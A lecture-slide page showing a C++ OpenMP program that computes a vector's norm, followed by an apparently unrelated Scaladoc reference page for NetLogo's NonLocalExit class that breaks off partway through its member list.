80%;">A rough classification of hardware models</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs009.html#___sec8" style="font-size: 80%;">Shared memory and distributed memory</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs010.html#___sec9" style="font-size: 80%;">Different parallel programming paradigms</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs011.html#___sec10" style="font-size: 80%;">Different parallel programming paradigms</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs012.html#___sec11" style="font-size: 80%;">What is vectorization?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs013.html#___sec12" style="font-size: 80%;">Number of elements that can acted upon</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs014.html#___sec13" style="font-size: 80%;">Number of elements that can acted upon, examples</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs015.html#___sec14" style="font-size: 80%;">Number of elements that can acted upon, examples</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs016.html#___sec15" style="font-size: 80%;">"A simple test case with and without vectorization":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program7.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs017.html#___sec16" style="font-size: 80%;">Compiling with and without vectorization</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs018.html#___sec17" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, criteria</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs019.html#___sec18" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, exit criteria</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs020.html#___sec19" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, straight-line code</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs021.html#___sec20" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, nested loops</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs022.html#___sec21" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, function calls</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs023.html#___sec22" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, data dependencies</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs024.html#___sec23" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, more data dependencies</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs025.html#___sec24" style="font-size: 80%;">Automatic vectorization and vectorization inhibitors, memory stride</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs026.html#___sec25" style="font-size: 80%;">Compiling with and without vectorization</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs027.html#___sec26" style="font-size: 80%;">Compiling with and without vectorization using clang</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs028.html#___sec27" style="font-size: 80%;">Memory management</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs029.html#___sec28" style="font-size: 80%;">Memory and communication</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs030.html#___sec29" style="font-size: 80%;">Measuring performance</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs031.html#___sec30" style="font-size: 80%;">Problems with measuring time</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs032.html#___sec31" style="font-size: 80%;">Problems with cold start</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs033.html#___sec32" style="font-size: 80%;">Problems with smart compilers</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs034.html#___sec33" style="font-size: 80%;">Problems with interference</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs035.html#___sec34" style="font-size: 80%;">Problems with measuring performance</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs036.html#___sec35" style="font-size: 80%;">Thomas algorithm for tridiagonal linear algebra equations</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs037.html#___sec36" style="font-size: 80%;">Thomas algorithm, forward substitution</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs038.html#___sec37" style="font-size: 80%;">Thomas algorithm, backward substitution</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs039.html#___sec38" style="font-size: 80%;">Thomas algorithm and counting of operations (floating point and memory)</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs040.html#___sec39" style="font-size: 80%;">"The specialized Thomas algorithm (Project 1)":"https://github.com/CompPhysics/ComputationalPhysics/blob/master/doc/Projects/2016/Project1/Examples/TridiagonalTiming.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs041.html#___sec40" style="font-size: 80%;">"Example: Transpose of a matrix":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program8.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs042.html#___sec41" style="font-size: 80%;">"Matrix-matrix multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program9.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs043.html#___sec42" style="font-size: 80%;">How do we define speedup? Simplest form</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs044.html#___sec43" style="font-size: 80%;">How do we define speedup? Correct baseline</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs045.html#___sec44" style="font-size: 80%;">Parallel speedup</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs046.html#___sec45" style="font-size: 80%;">Speedup and memory</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs047.html#___sec46" style="font-size: 80%;">Upper bounds on speedup</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs048.html#___sec47" style="font-size: 80%;">Amdahl's law</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs049.html#___sec48" style="font-size: 80%;">How much is parallelizable</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs050.html#___sec49" style="font-size: 80%;">Today's situation of parallel computing</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs051.html#___sec50" style="font-size: 80%;">Overhead present in parallel computing</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs052.html#___sec51" style="font-size: 80%;">Parallelizing a sequential algorithm</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs053.html#___sec52" style="font-size: 80%;">Strategies</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs054.html#___sec53" style="font-size: 80%;">How do I run MPI on a PC/Laptop? MPI</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs055.html#___sec54" style="font-size: 80%;">Can I do it on my own PC/laptop? OpenMP installation</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs056.html#___sec55" style="font-size: 80%;">Installing MPI</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs057.html#___sec56" style="font-size: 80%;">Installing MPI and using Qt</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs058.html#___sec57" style="font-size: 80%;">Using "Smaug":"http://comp-phys.net/cluster-info/using-smaug/", the CompPhys computing cluster</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs059.html#___sec58" style="font-size: 80%;">What is OpenMP</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs060.html#___sec59" style="font-size: 80%;">Getting started, things to remember</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs061.html#___sec60" style="font-size: 80%;">OpenMP syntax</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs062.html#___sec61" style="font-size: 80%;">Different OpenMP styles of parallelism</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs063.html#___sec62" style="font-size: 80%;">General code structure</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs064.html#___sec63" style="font-size: 80%;">Parallel region</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs065.html#___sec64" style="font-size: 80%;">Hello world, not again, please!</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs066.html#___sec65" style="font-size: 80%;">Hello world, yet another variant</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs067.html#___sec66" style="font-size: 80%;">Important OpenMP library routines</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs068.html#___sec67" style="font-size: 80%;">Private variables</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs069.html#___sec68" style="font-size: 80%;">Master region</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs070.html#___sec69" style="font-size: 80%;">Parallel for loop</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs071.html#___sec70" style="font-size: 80%;">Parallel computations and loops</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs072.html#___sec71" style="font-size: 80%;">Scheduling of loop computations</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs073.html#___sec72" style="font-size: 80%;">Example code for loop scheduling</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs074.html#___sec73" style="font-size: 80%;">Example code for loop scheduling, guided instead of dynamic</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs075.html#___sec74" style="font-size: 80%;">More on Parallel for loop</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs076.html#___sec75" style="font-size: 80%;">What can happen with this loop?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs077.html#___sec76" style="font-size: 80%;">Inner product</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs078.html#___sec77" style="font-size: 80%;">Different threads do different tasks</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs079.html#___sec78" style="font-size: 80%;">Single execution</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs080.html#___sec79" style="font-size: 80%;">Coordination and synchronization</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs081.html#___sec80" style="font-size: 80%;">Data scope</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs082.html#___sec81" style="font-size: 80%;">Some remarks</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs083.html#___sec82" style="font-size: 80%;">Parallelizing nested for-loops</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs084.html#___sec83" style="font-size: 80%;">Nested parallelism</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs085.html#___sec84" style="font-size: 80%;">Parallel tasks</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs086.html#___sec85" style="font-size: 80%;">Common mistakes</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs087.html#___sec86" style="font-size: 80%;">Not all computations are simple</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs088.html#___sec87" style="font-size: 80%;">Not all computations are simple, competing threads</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs089.html#___sec88" style="font-size: 80%;">How to find the max value using OpenMP</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs090.html#___sec89" style="font-size: 80%;">Then deal with the race conditions</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs091.html#___sec90" style="font-size: 80%;">What can slow down OpenMP performance?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs092.html#___sec91" style="font-size: 80%;">What can slow down OpenMP performance?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs093.html#___sec92" style="font-size: 80%;">Find the max location for each thread</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs094.html#___sec93" style="font-size: 80%;">Combine the values from each thread</a></li> <!-- navigation toc: --> <li><a href="#___sec94" style="font-size: 80%;">"Matrix-matrix multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/ParallelizationOpenMP/OpenMPvectornorm.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs096.html#___sec95" style="font-size: 80%;">"Matrix-matrix multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/ParallelizationOpenMP/OpenMPmatrixmatrixmult.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs097.html#___sec96" style="font-size: 80%;">What is Message Passing Interface (MPI)?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs098.html#___sec97" style="font-size: 80%;">Going Parallel with MPI</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs099.html#___sec98" style="font-size: 80%;">MPI is a library</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs100.html#___sec99" style="font-size: 80%;">Bindings to MPI routines</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs101.html#___sec100" style="font-size: 80%;">Communicator</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs102.html#___sec101" style="font-size: 80%;">Some of the most important MPI functions</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs103.html#___sec102" style="font-size: 80%;">"The first MPI C/C++ program":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program2.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs104.html#___sec103" style="font-size: 80%;">The Fortran program</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs105.html#___sec104" style="font-size: 80%;">Note 1</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs106.html#___sec105" style="font-size: 80%;">"Ordered output with MPIBarrier":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program3.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs107.html#___sec106" style="font-size: 80%;">Note 2</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs108.html#___sec107" style="font-size: 80%;">"Ordered output":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program4.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs109.html#___sec108" style="font-size: 80%;">Note 3</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs110.html#___sec109" style="font-size: 80%;">Note 4</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs111.html#___sec110" style="font-size: 80%;">"Numerical integration in parallel":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program6.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs112.html#___sec111" style="font-size: 80%;">Dissection of trapezoidal rule with \( MPI\_reduce \)</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs113.html#___sec112" style="font-size: 80%;">Dissection of trapezoidal rule</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs114.html#___sec113" style="font-size: 80%;">Integrating with <b>MPI</b></a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs115.html#___sec114" style="font-size: 80%;">How do I use \( MPI\_reduce \)?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs116.html#___sec115" style="font-size: 80%;">More on \( MPI\_Reduce \)</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs117.html#___sec116" style="font-size: 80%;">Dissection of trapezoidal rule</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs118.html#___sec117" style="font-size: 80%;">Dissection of trapezoidal rule</a></li> </ul> </li> </ul> </div> </div> </div> <!-- end of navigation bar --> <div class="container"> <p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p> <!-- add vertical space --> <a name="part0095"></a> <!-- !split --> <h2 id="___sec94" class="anchor"><a href="https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/ParallelizationOpenMP/OpenMPvectornorm.cpp" target="_self">Matrix-matrix multiplication</a> </h2> This code computes the norm of a vector using OpenMp <p> <!-- code=text typeset with pygments style "default" --> <div class="highlight" style="background: #f8f8f8"><pre style="line-height: 125%"><span></span>// OpenMP program to compute vector norm by adding two other vectors #include &lt;cstdlib&gt; #include &lt;iostream&gt; #include &lt;cmath&gt; #include &lt;iomanip&gt; #include &lt;omp.h&gt; # include &lt;ctime&gt; using namespace std; // note use of namespace int main (int argc, char* argv[]) { // read in dimension of vector int n = atoi(argv[1]); double *a, *b, *c; int i; int thread_num; double wtime, Norm2, s, angle; cout &lt;&lt; &quot; Perform addition of two vectors and compute the norm-2.&quot; &lt;&lt; endl; omp_set_num_threads(4); thread_num = omp_get_max_threads (); cout &lt;&lt; &quot; The number of processors available = &quot; &lt;&lt; omp_get_num_procs () &lt;&lt; endl ; cout &lt;&lt; &quot; The number of threads available = &quot; &lt;&lt; thread_num &lt;&lt; endl; cout &lt;&lt; &quot; The matrix order n = &quot; &lt;&lt; n &lt;&lt; endl; s = 1.0/sqrt( (double) n); wtime = omp_get_wtime ( ); // Allocate space for the vectors to be used a = new double [n]; b = new double [n]; c = new double [n]; // Define parallel region # pragma omp parallel for default(shared) private (angle, i) reduction(+:Norm2) // Set up values for vectors a and b for (i = 0; i &lt; n; i++){ angle = 2.0*M_PI*i/ (( double ) n); a[i] = s*(sin(angle) + cos(angle)); b[i] = s*sin(2.0*angle); c[i] = 0.0; } // Then perform the vector addition for (i = 0; i &lt; n; i++){ c[i] += a[i]+b[i]; } // Compute now the norm-2 Norm2 = 0.0; for (i = 0; i &lt; n; i++){ Norm2 += c[i]*c[i]; } // end parallel region wtime = omp_get_wtime ( ) - wtime; cout &lt;&lt; setiosflags(ios::showpoint | ios::uppercase); cout &lt;&lt; setprecision(10) &lt;&lt; setw(20) &lt;&lt; &quot;Time used for norm-2 computation=&quot; &lt;&lt; wtime &lt;&lt; endl; cout &lt;&lt; &quot; Norm-2 = &quot; &lt;&lt; Norm2 &lt;&lt; endl; // Free up space delete[] a; delete[] b; delete[] c; return 0; } </pre></div> <p> <p> <!-- navigation buttons at the bottom of the page --> <ul class="pagination"> <li><a href="._codeoptimization-bs094.html">&laquo;</a></li> <li><a href="._codeoptimization-bs000.html">1</a></li> <li><a href="">...</a></li> <li><a href="._codeoptimization-bs087.html">88</a></li> <li><a href="._codeoptimization-bs088.html">89</a></li> <li><a href="._codeoptimization-bs089.html">90</a></li> <li><a href="._codeoptimization-bs090.html">91</a></li> <li><a href="._codeoptimization-bs091.html">92</a></li> <li><a href="._codeoptimization-bs092.html">93</a></li> <li><a href="._codeoptimization-bs093.html">94</a></li> <li><a href="._codeoptimization-bs094.html">95</a></li> <li class="active"><a href="._codeoptimization-bs095.html">96</a></li> <li><a href="._codeoptimization-bs096.html">97</a></li> <li><a href="._codeoptimization-bs097.html">98</a></li> <li><a href="._codeoptimization-bs098.html">99</a></li> <li><a href="._codeoptimization-bs099.html">100</a></li> <li><a href="._codeoptimization-bs100.html">101</a></li> <li><a href="._codeoptimization-bs101.html">102</a></li> <li><a href="._codeoptimization-bs102.html">103</a></li> <li><a href="._codeoptimization-bs103.html">104</a></li> <li><a href="._codeoptimization-bs104.html">105</a></li> <li><a href="">...</a></li> <li><a href="._codeoptimization-bs118.html">119</a></li> <li><a href="._codeoptimization-bs096.html">&raquo;</a></li> </ul> <!-- ------------------- end of main content --------------- --> </div> <!-- end container --> <!-- include javascript, jQuery *first* --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script src="https://netdna.bootstrapcdn.com/bootstrap/3.0.0/js/bootstrap.min.js"></script> <!-- Bootstrap footer <footer> <a href="http://..."><img width="250" align=right src="http://..."></a> </footer> --> <center style="font-size:80%"> <!-- copyright only on the titlepage --> </center> </body> </html>
scaladoc/org/nlogo/nvm/NonLocalExit$.html
jingsam/netlogo-manual-zh
<?xml version='1.0' encoding='UTF-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>org.nlogo.nvm.NonLocalExit</title> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <link type="text/css" media="screen" rel="stylesheet" href="../../../lib/template.css" /> <script type="text/javascript" src="../../../lib/jquery.js"></script> <script type="text/javascript" src="../../../lib/jquery-ui.js"></script> <script type="text/javascript" src="../../../lib/template.js"></script> <script type="text/javascript" src="../../../lib/tools.tooltip.js"></script> </head> <body class="value"> <div id="definition"> <img src="../../../lib/object_big.png" /> <p id="owner"><a name="org" class="extype" href="../../package.html">org</a>.<a name="org.nlogo" class="extype" href="../package.html">nlogo</a>.<a name="org.nlogo.nvm" class="extype" href="package.html">nvm</a></p> <h1>NonLocalExit</h1> </div> <h4 class="signature" id="signature"> <span class="kind">object</span> <span class="symbol"> <span class="name">NonLocalExit</span> <span class="result"> extends <span name="java.lang.RuntimeException" class="extype">RuntimeException</span></span> </span> </h4> <div class="fullcommenttop" id="comment"><dl class="attributes block"> <dt>Source</dt><dd><a href="https://github.com/NetLogo/NetLogo/blob/5.0/src/main/org/nlogo/nvm/NonLocalExit.scala">NonLocalExit.scala</a></dd></dl><div class="toggleContainer block"> <span class="toggle">Linear Supertypes</span> <div class="superTypes hiddenContent"><span name="java.lang.RuntimeException" class="extype">RuntimeException</span>, <span name="java.lang.Exception" class="extype">Exception</span>, <span name="java.lang.Throwable" class="extype">Throwable</span>, <span name="java.io.Serializable" class="extype">Serializable</span>, AnyRef, <span name="scala.Any" class="extype">Any</span></div> </div></div> <div id="template"> <div id="mbrsel"> <div id="textfilter"><span class="pre"></span><span class="input"><input accesskey="/" type="text" /></span><span class="post"></span></div> <div id="order"> <span class="filtertype">Ordering</span> <ol><li class="alpha in"><span>Alphabetic</span></li><li class="inherit out"><span>By inheritance</span></li></ol> </div> <div id="ancestors"> <span class="filtertype">Inherited</span> <ol><li class="hideall out"><span>Hide All</span></li> <li class="showall in"><span>Show all</span></li></ol> <ol id="linearization"><li name="org.nlogo.nvm.NonLocalExit" class="in"><span>NonLocalExit</span></li><li name="java.lang.RuntimeException" class="in"><span>RuntimeException</span></li><li name="java.lang.Exception" class="in"><span>Exception</span></li><li name="java.lang.Throwable" class="in"><span>Throwable</span></li><li name="java.io.Serializable" class="in"><span>Serializable</span></li><li name="scala.AnyRef" class="in"><span>AnyRef</span></li><li name="scala.Any" class="in"><span>Any</span></li></ol> </div> <div id="visbl"> <span class="filtertype">Visibility</span> <ol><li class="public in"><span>Public</span></li><li class="all out"><span>All</span></li></ol> </div> </div> <div class="values members" id="values"> <h3>Value Members</h3> <ol><li visbl="pub" name="scala.AnyRef#!=" data-isabs="false"> <a id="!=(AnyRef):Boolean"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">!=</span> <span class="params">(<span name="arg0">arg0: AnyRef</span>)</span><span class="result">: <span name="scala.Boolean" class="extype">Boolean</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef</dd></dl></div> </li><li visbl="pub" name="scala.Any#!=" data-isabs="false"> <a id="!=(Any):Boolean"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">!=</span> <span class="params">(<span name="arg0">arg0: <span name="scala.Any" class="extype">Any</span></span>)</span><span class="result">: <span name="scala.Boolean" class="extype">Boolean</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>Any</dd></dl></div> </li><li visbl="pub" name="scala.AnyRef###" data-isabs="false"> <a id="##():Int"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">##</span> <span class="params">()</span><span class="result">: <span name="scala.Int" class="extype">Int</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#==" data-isabs="false"> <a id="==(AnyRef):Boolean"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">==</span> <span class="params">(<span name="arg0">arg0: AnyRef</span>)</span><span class="result">: <span name="scala.Boolean" class="extype">Boolean</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef</dd></dl></div> </li><li visbl="pub" name="scala.Any#==" data-isabs="false"> <a id="==(Any):Boolean"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">==</span> <span class="params">(<span name="arg0">arg0: <span name="scala.Any" class="extype">Any</span></span>)</span><span class="result">: <span name="scala.Boolean" class="extype">Boolean</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>Any</dd></dl></div> </li><li visbl="pub" name="scala.Any#asInstanceOf" data-isabs="false"> <a id="asInstanceOf[T0]:T0"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">asInstanceOf</span> <span class="tparams">[<span name="T0">T0</span>]</span> <span class="result">: T0</span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>Any</dd></dl></div> </li><li visbl="prt" name="scala.AnyRef#clone" data-isabs="false"> <a id="clone():AnyRef"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">clone</span> <span class="params">()</span><span class="result">: AnyRef</span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>protected[<a name="java.lang" class="extype" href="../../../java/lang/package.html">lang</a>] </dd><dt>Definition Classes</dt><dd>AnyRef</dd><dt>Annotations</dt><dd> <span class="name">@throws</span><span class="args">()</span> </dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#eq" data-isabs="false"> <a id="eq(AnyRef):Boolean"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">eq</span> <span class="params">(<span name="arg0">arg0: AnyRef</span>)</span><span class="result">: <span name="scala.Boolean" class="extype">Boolean</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef</dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#equals" data-isabs="false"> <a id="equals(Any):Boolean"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">equals</span> <span class="params">(<span name="arg0">arg0: <span name="scala.Any" class="extype">Any</span></span>)</span><span class="result">: <span name="scala.Boolean" class="extype">Boolean</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div> </li><li visbl="pub" name="org.nlogo.nvm.NonLocalExit#fillInStackTrace" data-isabs="false"> <a id="fillInStackTrace():org.nlogo.nvm.NonLocalExit.type"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">fillInStackTrace</span> <span class="params">()</span><span class="result">: org.nlogo.nvm.NonLocalExit.type</span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd><a name="org.nlogo.nvm.NonLocalExit" class="extype" href="">NonLocalExit</a> → Throwable</dd></dl></div> </li><li visbl="prt" name="scala.AnyRef#finalize" data-isabs="false"> <a id="finalize():Unit"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">finalize</span> <span class="params">()</span><span class="result">: <span name="scala.Unit" class="extype">Unit</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>protected[<a name="java.lang" class="extype" href="../../../java/lang/package.html">lang</a>] </dd><dt>Definition Classes</dt><dd>AnyRef</dd><dt>Annotations</dt><dd> <span class="name">@throws</span><span class="args">()</span> </dd></dl></div> </li><li visbl="pub" name="java.lang.Throwable#getCause" data-isabs="false"> <a id="getCause():Throwable"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">getCause</span> <span class="params">()</span><span class="result">: <span name="java.lang.Throwable" class="extype">Throwable</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Throwable</dd></dl></div> </li><li visbl="pub" name="scala.AnyRef#getClass" data-isabs="false"> <a id="getClass():java.lang.Class[_]"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">getClass</span> <span class="params">()</span><span class="result">: java.lang.Class[_]</span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>final </dd><dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div> </li><li visbl="pub" name="java.lang.Throwable#getLocalizedMessage" data-isabs="false"> <a id="getLocalizedMessage():String"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">getLocalizedMessage</span> <span class="params">()</span><span class="result">: <span name="java.lang.String" class="extype">String</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Throwable</dd></dl></div> </li><li visbl="pub" name="java.lang.Throwable#getMessage" data-isabs="false"> <a id="getMessage():String"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">getMessage</span> <span class="params">()</span><span class="result">: <span name="java.lang.String" class="extype">String</span></span> </span> </h4> <div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Throwable</dd></dl></div> </li><li visbl="pub" name="java.lang.Throwable#getStackTrace" data-isabs="false"> <a id="getStackTrace():Array[StackTraceElement]"></a> <h4 class="signature"> <span class="kind">def</span> <span class="symbol"> <span class="name">getStackTrace</span> <span class="params">()</span><span class="result">: <span name="scala.Array" class="extype">Array</span>[<span name="java.lang.StackTraceElement" class="extype">StackTraceElement</span>]</span> </span> </h4> <div 